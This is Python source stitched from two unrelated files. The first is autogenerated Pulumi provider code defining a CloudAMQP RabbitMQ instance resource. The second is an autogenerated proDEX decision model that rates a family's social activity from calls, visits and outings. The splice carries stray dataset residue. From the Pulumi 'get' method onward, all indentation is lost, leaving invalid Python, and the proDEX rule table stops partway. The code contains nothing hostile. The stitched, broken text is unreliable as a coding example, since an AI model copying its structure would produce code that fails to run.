    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="vpcSubnet")
    def vpc_subnet(self) -> Optional[pulumi.Input[str]]:
        """
        Creates a dedicated VPC subnet; shouldn't overlap with other VPC subnets. Default subnet is 10.56.72.0/24. **NOTE: an extra fee is charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
        """
        return pulumi.get(self, "vpc_subnet")

    @vpc_subnet.setter
    def vpc_subnet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vpc_subnet", value)
@pulumi.input_type
class _InstanceState:
    def __init__(__self__, *,
                 apikey: Optional[pulumi.Input[str]] = None,
                 dedicated: Optional[pulumi.Input[bool]] = None,
                 host: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 no_default_alarms: Optional[pulumi.Input[bool]] = None,
                 nodes: Optional[pulumi.Input[int]] = None,
                 plan: Optional[pulumi.Input[str]] = None,
                 ready: Optional[pulumi.Input[bool]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 rmq_version: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 url: Optional[pulumi.Input[str]] = None,
                 vhost: Optional[pulumi.Input[str]] = None,
                 vpc_subnet: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Instance resources.
        :param pulumi.Input[str] apikey: API key needed to communicate with CloudAMQP's second API. The second API is used to manage alarms, integrations and more; full description at [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html).
        :param pulumi.Input[bool] dedicated: Whether the instance is hosted on a dedicated server.
        :param pulumi.Input[str] host: The host name for the CloudAMQP instance.
        :param pulumi.Input[str] name: Name of the CloudAMQP instance.
        :param pulumi.Input[bool] no_default_alarms: Set to true to skip creating default alarms when the instance is created. Can be left out; defaults to false.
        :param pulumi.Input[int] nodes: Number of nodes: 1, 3 or 5. **DEPRECATED. To change the number of nodes, update the subscription `plan` instead.**
        :param pulumi.Input[str] plan: The subscription plan. See available plans.
        :param pulumi.Input[bool] ready: Flag describing if the resource is ready.
        :param pulumi.Input[str] region: The region to host the instance in. See Instance regions.
        :param pulumi.Input[str] rmq_version: The RabbitMQ version. Can be left out; the CloudAMQP API default is then used. **Note: the provider cannot yet change the RMQ version. Once set at creation, it will remain.**
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: One or more tags for the CloudAMQP instance, making it possible to categorize multiple instances in the console view. By default no tags are assigned.
        :param pulumi.Input[str] url: AMQP server endpoint. `amqps://{username}:{password}@{hostname}/{vhost}`
        :param pulumi.Input[str] vhost: The virtual host used by RabbitMQ.
        :param pulumi.Input[str] vpc_subnet: Creates a dedicated VPC subnet; shouldn't overlap with other VPC subnets. Default subnet is 10.56.72.0/24. **NOTE: an extra fee is charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
        """
        if apikey is not None:
            pulumi.set(__self__, "apikey", apikey)
        if dedicated is not None:
            pulumi.set(__self__, "dedicated", dedicated)
        if host is not None:
            pulumi.set(__self__, "host", host)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if no_default_alarms is not None:
            pulumi.set(__self__, "no_default_alarms", no_default_alarms)
        if nodes is not None:
            pulumi.set(__self__, "nodes", nodes)
        if plan is not None:
            pulumi.set(__self__, "plan", plan)
        if ready is not None:
            pulumi.set(__self__, "ready", ready)
        if region is not None:
            pulumi.set(__self__, "region", region)
        if rmq_version is not None:
            pulumi.set(__self__, "rmq_version", rmq_version)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if url is not None:
            pulumi.set(__self__, "url", url)
        if vhost is not None:
            pulumi.set(__self__, "vhost", vhost)
        if vpc_subnet is not None:
            pulumi.set(__self__, "vpc_subnet", vpc_subnet)
    @property
    @pulumi.getter
    def apikey(self) -> Optional[pulumi.Input[str]]:
        """
        API key needed to communicate with CloudAMQP's second API. The second API is used to manage alarms, integrations and more; full description at [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html).
        """
        return pulumi.get(self, "apikey")

    @apikey.setter
    def apikey(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "apikey", value)

    @property
    @pulumi.getter
    def dedicated(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the instance is hosted on a dedicated server.
        """
        return pulumi.get(self, "dedicated")

    @dedicated.setter
    def dedicated(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "dedicated", value)

    @property
    @pulumi.getter
    def host(self) -> Optional[pulumi.Input[str]]:
        """
        The host name for the CloudAMQP instance.
        """
        return pulumi.get(self, "host")

    @host.setter
    def host(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the CloudAMQP instance.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="noDefaultAlarms")
    def no_default_alarms(self) -> Optional[pulumi.Input[bool]]:
        """
        Set to true to skip creating default alarms when the instance is created. Can be left out; defaults to false.
        """
        return pulumi.get(self, "no_default_alarms")

    @no_default_alarms.setter
    def no_default_alarms(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "no_default_alarms", value)

    @property
    @pulumi.getter
    def nodes(self) -> Optional[pulumi.Input[int]]:
        """
        Number of nodes: 1, 3 or 5. **DEPRECATED. To change the number of nodes, update the subscription `plan` instead.**
        """
        return pulumi.get(self, "nodes")

    @nodes.setter
    def nodes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "nodes", value)

    @property
    @pulumi.getter
    def plan(self) -> Optional[pulumi.Input[str]]:
        """
        The subscription plan. See available plans.
        """
        return pulumi.get(self, "plan")

    @plan.setter
    def plan(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "plan", value)

    @property
    @pulumi.getter
    def ready(self) -> Optional[pulumi.Input[bool]]:
        """
        Flag describing if the resource is ready.
        """
        return pulumi.get(self, "ready")

    @ready.setter
    def ready(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "ready", value)

    @property
    @pulumi.getter
    def region(self) -> Optional[pulumi.Input[str]]:
        """
        The region to host the instance in. See Instance regions.
        """
        return pulumi.get(self, "region")

    @region.setter
    def region(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "region", value)

    @property
    @pulumi.getter(name="rmqVersion")
    def rmq_version(self) -> Optional[pulumi.Input[str]]:
        """
        The RabbitMQ version. Can be left out; the CloudAMQP API default is then used. **Note: the provider cannot yet change the RMQ version. Once set at creation, it will remain.**
        """
        return pulumi.get(self, "rmq_version")

    @rmq_version.setter
    def rmq_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rmq_version", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        One or more tags for the CloudAMQP instance, making it possible to categorize multiple instances in the console view. By default no tags are assigned.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        """
        AMQP server endpoint. `amqps://{username}:{password}@{hostname}/{vhost}`
        """
        return pulumi.get(self, "url")

    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)

    @property
    @pulumi.getter
    def vhost(self) -> Optional[pulumi.Input[str]]:
        """
        The virtual host used by RabbitMQ.
        """
        return pulumi.get(self, "vhost")

    @vhost.setter
    def vhost(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vhost", value)

    @property
    @pulumi.getter(name="vpcSubnet")
    def vpc_subnet(self) -> Optional[pulumi.Input[str]]:
        """
        Creates a dedicated VPC subnet; shouldn't overlap with other VPC subnets. Default subnet is 10.56.72.0/24. **NOTE: an extra fee is charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
        """
        return pulumi.get(self, "vpc_subnet")

    @vpc_subnet.setter
    def vpc_subnet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vpc_subnet", value)
class Instance(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 no_default_alarms: Optional[pulumi.Input[bool]] = None,
                 nodes: Optional[pulumi.Input[int]] = None,
                 plan: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 rmq_version: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 vpc_subnet: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        This resource allows you to create and manage a CloudAMQP instance running RabbitMQ, deployable to multiple cloud platform providers across multiple regions; see Instance regions for more information.

        Once the instance is created it will be assigned a unique identifier. All other resources and data sources created for this instance need to reference the instance identifier.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_cloudamqp as cloudamqp

        # Minimum free lemur instance
        lemur_instance = cloudamqp.Instance("lemurInstance",
            plan="lemur",
            region="amazon-web-services::us-west-1")
        # New dedicated bunny instance
        instance = cloudamqp.Instance("instance",
            no_default_alarms=True,
            nodes=1,
            plan="bunny-1",
            region="amazon-web-services::us-west-1",
            rmq_version="3.8.3",
            tags=["terraform"])
        ```

        ## Import

        `cloudamqp_instance` can be imported using the CloudAMQP internal identifier. To retrieve the identifier for an instance, use the [CloudAMQP customer API](https://docs.cloudamqp.com/#list-instances).

        ```sh
        $ pulumi import cloudamqp:index/instance:Instance instance <id>
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] name: Name of the CloudAMQP instance.
        :param pulumi.Input[bool] no_default_alarms: Set to true to skip creating default alarms when the instance is created. Can be left out; defaults to false.
        :param pulumi.Input[int] nodes: Number of nodes: 1, 3 or 5. **DEPRECATED. To change the number of nodes, update the subscription `plan` instead.**
        :param pulumi.Input[str] plan: The subscription plan. See available plans.
        :param pulumi.Input[str] region: The region to host the instance in. See Instance regions.
        :param pulumi.Input[str] rmq_version: The RabbitMQ version. Can be left out; the CloudAMQP API default is then used. **Note: the provider cannot yet change the RMQ version. Once set at creation, it will remain.**
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: One or more tags for the CloudAMQP instance, making it possible to categorize multiple instances in the console view. By default no tags are assigned.
        :param pulumi.Input[str] vpc_subnet: Creates a dedicated VPC subnet; shouldn't overlap with other VPC subnets. Default subnet is 10.56.72.0/24. **NOTE: an extra fee is charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: InstanceArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        This resource allows you to create and manage a CloudAMQP instance running RabbitMQ, deployable to multiple cloud platform providers across multiple regions; see Instance regions for more information.

        Once the instance is created it will be assigned a unique identifier. All other resources and data sources created for this instance need to reference the instance identifier.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_cloudamqp as cloudamqp

        # Minimum free lemur instance
        lemur_instance = cloudamqp.Instance("lemurInstance",
            plan="lemur",
            region="amazon-web-services::us-west-1")
        # New dedicated bunny instance
        instance = cloudamqp.Instance("instance",
            no_default_alarms=True,
            nodes=1,
            plan="bunny-1",
            region="amazon-web-services::us-west-1",
            rmq_version="3.8.3",
            tags=["terraform"])
        ```

        ## Import

        `cloudamqp_instance` can be imported using the CloudAMQP internal identifier. To retrieve the identifier for an instance, use the [CloudAMQP customer API](https://docs.cloudamqp.com/#list-instances).

        ```sh
        $ pulumi import cloudamqp:index/instance:Instance instance <id>
        ```

        :param str resource_name: The name of the resource.
        :param InstanceArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(InstanceArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       no_default_alarms: Optional[pulumi.Input[bool]] = None,
                       nodes: Optional[pulumi.Input[int]] = None,
                       plan: Optional[pulumi.Input[str]] = None,
                       region: Optional[pulumi.Input[str]] = None,
                       rmq_version: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       vpc_subnet: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = InstanceArgs.__new__(InstanceArgs)

            __props__.__dict__["name"] = name
            __props__.__dict__["no_default_alarms"] = no_default_alarms
            __props__.__dict__["nodes"] = nodes
            if plan is None and not opts.urn:
                raise TypeError("Missing required property 'plan'")
            __props__.__dict__["plan"] = plan
            if region is None and not opts.urn:
                raise TypeError("Missing required property 'region'")
            __props__.__dict__["region"] = region
            __props__.__dict__["rmq_version"] = rmq_version
            __props__.__dict__["tags"] = tags
            __props__.__dict__["vpc_subnet"] = vpc_subnet
            __props__.__dict__["apikey"] = None
            __props__.__dict__["dedicated"] = None
            __props__.__dict__["host"] = None
            __props__.__dict__["ready"] = None
            __props__.__dict__["url"] = None
            __props__.__dict__["vhost"] = None
        super(Instance, __self__).__init__(
            'cloudamqp:index/instance:Instance',
            resource_name,
            __props__,
            opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
apikey: Optional[pulumi.Input[str]] = None,
dedicated: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
no_default_alarms: Optional[pulumi.Input[bool]] = None,
nodes: Optional[pulumi.Input[int]] = None,
plan: Optional[pulumi.Input[str]] = None,
ready: Optional[pulumi.Input[bool]] = None,
region: Optional[pulumi.Input[str]] = None,
rmq_version: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None,
vhost: Optional[pulumi.Input[str]] = None,
vpc_subnet: Optional[pulumi.Input[str]] = None) -> 'Instance':
"""
Get an existing Instance resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] apikey: API key used to communicate with CloudAMQP's second API. This API manages alarms, integrations, and more; full description at [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html).
:param pulumi.Input[bool] dedicated: Whether the instance is hosted on a dedicated server.
:param pulumi.Input[str] host: The host name for the CloudAMQP instance.
:param pulumi.Input[str] name: Name of the CloudAMQP instance.
:param pulumi.Input[bool] no_default_alarms: Set to true to skip creating default alarms when the instance is created. Defaults to false if omitted.
:param pulumi.Input[int] nodes: Number of nodes: 1, 3, or 5. **DEPRECATED: to change the number of nodes, update the subscription `plan` instead.**
:param pulumi.Input[str] plan: The subscription plan. See the available plans.
:param pulumi.Input[bool] ready: Flag indicating whether the resource is ready.
:param pulumi.Input[str] region: The region to host the instance in. See the available instance regions.
:param pulumi.Input[str] rmq_version: The RabbitMQ version. If omitted, the default value used by the CloudAMQP API is applied. **Note: the provider does not yet support changing the RabbitMQ version; once set at creation, it remains fixed.**
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: One or more tags for the CloudAMQP instance, making it possible to categorize multiple instances in the console view. By default, no tags are assigned.
:param pulumi.Input[str] url: AMQP server endpoint. `amqps://{username}:{password}@{hostname}/{vhost}`
:param pulumi.Input[str] vhost: The virtual host used by RabbitMQ.
:param pulumi.Input[str] vpc_subnet: Creates a dedicated VPC subnet that should not overlap with other VPC subnets; the default subnet is 10.56.72.0/24. **NOTE: an extra fee is charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InstanceState.__new__(_InstanceState)
__props__.__dict__["apikey"] = apikey
__props__.__dict__["dedicated"] = dedicated
__props__.__dict__["host"] = host
__props__.__dict__["name"] = name
__props__.__dict__["no_default_alarms"] = no_default_alarms
__props__.__dict__["nodes"] = nodes
__props__.__dict__["plan"] = plan
__props__.__dict__["ready"] = ready
__props__.__dict__["region"] = region
__props__.__dict__["rmq_version"] = rmq_version
__props__.__dict__["tags"] = tags
__props__.__dict__["url"] = url
__props__.__dict__["vhost"] = vhost
__props__.__dict__["vpc_subnet"] = vpc_subnet
return Instance(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def apikey(self) -> pulumi.Output[str]:
"""
API key used to communicate with CloudAMQP's second API. This API manages alarms, integrations, and more; full description at [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html).
"""
return pulumi.get(self, "apikey")
@property
@pulumi.getter
def dedicated(self) -> pulumi.Output[bool]:
"""
Whether the instance is hosted on a dedicated server.
"""
return pulumi.get(self, "dedicated")
@property
@pulumi.getter
def host(self) -> pulumi.Output[str]:
"""
The host name for the CloudAMQP instance.
"""
return pulumi.get(self, "host")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the CloudAMQP instance.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="noDefaultAlarms")
def no_default_alarms(self) -> pulumi.Output[bool]:
"""
Set to true to skip creating default alarms when the instance is created. Defaults to false if omitted.
"""
return pulumi.get(self, "no_default_alarms")
@property
@pulumi.getter
def nodes(self) -> pulumi.Output[Optional[int]]:
"""
Number of nodes: 1, 3, or 5. **DEPRECATED: to change the number of nodes, update the subscription `plan` instead.**
"""
return pulumi.get(self, "nodes")
@property
@pulumi.getter
def plan(self) -> pulumi.Output[str]:
"""
The subscription plan. See the available plans.
"""
return pulumi.get(self, "plan")
@property
@pulumi.getter
def ready(self) -> pulumi.Output[bool]:
"""
Flag indicating whether the resource is ready.
"""
return pulumi.get(self, "ready")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region to host the instance in. See the available instance regions.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="rmqVersion")
def rmq_version(self) -> pulumi.Output[str]:
"""
The RabbitMQ version. If omitted, the default value used by the CloudAMQP API is applied. **Note: the provider does not yet support changing the RabbitMQ version; once set at creation, it remains fixed.**
"""
return pulumi.get(self, "rmq_version")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
One or more tags for the CloudAMQP instance, making it possible to categorize multiple instances in the console view. By default, no tags are assigned.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def url(self) -> pulumi.Output[str]:
"""
AMQP server endpoint. `amqps://{username}:{password}@{hostname}/{vhost}`
"""
return pulumi.get(self, "url")
@property
@pulumi.getter
def vhost(self) -> pulumi.Output[str]:
"""
The virtual host used by RabbitMQ.
"""
return pulumi.get(self, "vhost")
@property
@pulumi.getter(name="vpcSubnet")
def vpc_subnet(self) -> pulumi.Output[Optional[str]]:
"""
Creates a dedicated VPC subnet that should not overlap with other VPC subnets; the default subnet is 10.56.72.0/24. **NOTE: an extra fee is charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
return pulumi.get(self, "vpc_subnet")
# File: pm/models/situ_social_activity_family.py (repo: aosojnik/pipeline-manager-features-models, license: MIT)
] | null | null | null | ##################################################################################
##########--this is an autogenerated python model definition for proDEX--#########
##--original file: Family_Assessment_v05_forprodex.dxi --##
##################################################################################
from .lib.proDEX import *
situ_social_activity_family = Node()
Relative_activity_Family = Node()
calls_last_7_days = Node()
visits_last_7_days = Node()
together_outside_last_7_days = Node()
Absolute_daily_activity_Family = Node()
feat_calls_count_family_relative = Atrib()
feat_calls_duration_family_relative = Atrib()
feat_visits_family_relative_past_week = Atrib()
feat_visits_family_relative = Atrib()
feat_outside_family_relative_past_week = Atrib()
feat_outside_family_relative = Atrib()
feat_calls_count_family_weekly_vs_goal = Atrib()
feat_visits_count_family_weekly_vs_goal = Atrib()
feat_outside_count_family_weekly_vs_goal = Atrib()
situ_social_activity_family.setName('situ_social_activity_family')
Relative_activity_Family.setName('Relative_activity_Family')
calls_last_7_days.setName('calls_last_7_days')
visits_last_7_days.setName('visits_last_7_days')
together_outside_last_7_days.setName('together_outside_last_7_days')
Absolute_daily_activity_Family.setName('Absolute_daily_activity_Family')
feat_calls_count_family_relative.setName('feat_calls_count_family_relative')
feat_calls_duration_family_relative.setName('feat_calls_duration_family_relative')
feat_visits_family_relative_past_week.setName('feat_visits_family_relative_past_week')
feat_visits_family_relative.setName('feat_visits_family_relative')
feat_outside_family_relative_past_week.setName('feat_outside_family_relative_past_week')
feat_outside_family_relative.setName('feat_outside_family_relative')
feat_calls_count_family_weekly_vs_goal.setName('feat_calls_count_family_weekly_vs_goal')
feat_visits_count_family_weekly_vs_goal.setName('feat_visits_count_family_weekly_vs_goal')
feat_outside_count_family_weekly_vs_goal.setName('feat_outside_count_family_weekly_vs_goal')
situ_social_activity_family.setValues(['very_low', 'low', 'medium', 'high', 'very_high'])
Relative_activity_Family.setValues(['high decrease', 'decrease', 'stable', 'increase', 'high increase'])
calls_last_7_days.setValues(['decrease', 'stable', 'increase'])
visits_last_7_days.setValues(['decrease', 'stable', 'increase'])
together_outside_last_7_days.setValues(['decrease', 'stable', 'increase'])
Absolute_daily_activity_Family.setValues(['very low', 'low', 'medium', 'high', 'very high'])
feat_calls_count_family_relative.setValues(['decrease', 'stable', 'increase'])
feat_calls_duration_family_relative.setValues(['decrease', 'stable', 'increase'])
feat_visits_family_relative_past_week.setValues(['decrease', 'stable', 'increase'])
feat_visits_family_relative.setValues(['decrease', 'stable', 'increase'])
feat_outside_family_relative_past_week.setValues(['decrease', 'stable', 'increase'])
feat_outside_family_relative.setValues(['decrease', 'stable', 'increase'])
feat_calls_count_family_weekly_vs_goal.setValues(['low', 'medium', 'high'])
feat_visits_count_family_weekly_vs_goal.setValues(['low', 'medium', 'high'])
feat_outside_count_family_weekly_vs_goal.setValues(['low', 'medium', 'high'])
situ_social_activity_family.addChild(Relative_activity_Family)
Relative_activity_Family.setParent(situ_social_activity_family)
situ_social_activity_family.addChild(Absolute_daily_activity_Family)
Absolute_daily_activity_Family.setParent(situ_social_activity_family)
Relative_activity_Family.addChild(calls_last_7_days)
calls_last_7_days.setParent(Relative_activity_Family)
Relative_activity_Family.addChild(visits_last_7_days)
visits_last_7_days.setParent(Relative_activity_Family)
Relative_activity_Family.addChild(together_outside_last_7_days)
together_outside_last_7_days.setParent(Relative_activity_Family)
calls_last_7_days.addChild(feat_calls_count_family_relative)
feat_calls_count_family_relative.setParent(calls_last_7_days)
calls_last_7_days.addChild(feat_calls_duration_family_relative)
feat_calls_duration_family_relative.setParent(calls_last_7_days)
visits_last_7_days.addChild(feat_visits_family_relative_past_week)
feat_visits_family_relative_past_week.setParent(visits_last_7_days)
visits_last_7_days.addChild(feat_visits_family_relative)
feat_visits_family_relative.setParent(visits_last_7_days)
together_outside_last_7_days.addChild(feat_outside_family_relative_past_week)
feat_outside_family_relative_past_week.setParent(together_outside_last_7_days)
together_outside_last_7_days.addChild(feat_outside_family_relative)
feat_outside_family_relative.setParent(together_outside_last_7_days)
Absolute_daily_activity_Family.addChild(feat_calls_count_family_weekly_vs_goal)
feat_calls_count_family_weekly_vs_goal.setParent(Absolute_daily_activity_Family)
Absolute_daily_activity_Family.addChild(feat_visits_count_family_weekly_vs_goal)
feat_visits_count_family_weekly_vs_goal.setParent(Absolute_daily_activity_Family)
Absolute_daily_activity_Family.addChild(feat_outside_count_family_weekly_vs_goal)
feat_outside_count_family_weekly_vs_goal.setParent(Absolute_daily_activity_Family)
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'very low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'medium'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'high'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'very high'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'very low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'low'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'medium'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'high'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'very high'}, 'very_high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'very low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'low'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'medium'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'high'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'very high'}, 'very_high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'very low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'low'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'medium'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'high'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'very high'}, 'very_high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'very low'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'low'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'medium'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'high'}, 'very_high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'very high'}, 'very_high'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'decrease', together_outside_last_7_days:'decrease'}, 'high decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'decrease', together_outside_last_7_days:'stable'}, 'high decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'decrease', together_outside_last_7_days:'increase'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'stable', together_outside_last_7_days:'decrease'}, 'high decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'stable', together_outside_last_7_days:'stable'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'stable', together_outside_last_7_days:'increase'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'increase', together_outside_last_7_days:'decrease'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'increase', together_outside_last_7_days:'stable'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'increase', together_outside_last_7_days:'increase'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'decrease', together_outside_last_7_days:'decrease'}, 'high decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'decrease', together_outside_last_7_days:'stable'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'decrease', together_outside_last_7_days:'increase'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'stable', together_outside_last_7_days:'decrease'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'stable', together_outside_last_7_days:'stable'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'stable', together_outside_last_7_days:'increase'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'increase', together_outside_last_7_days:'decrease'}, 'stable'])
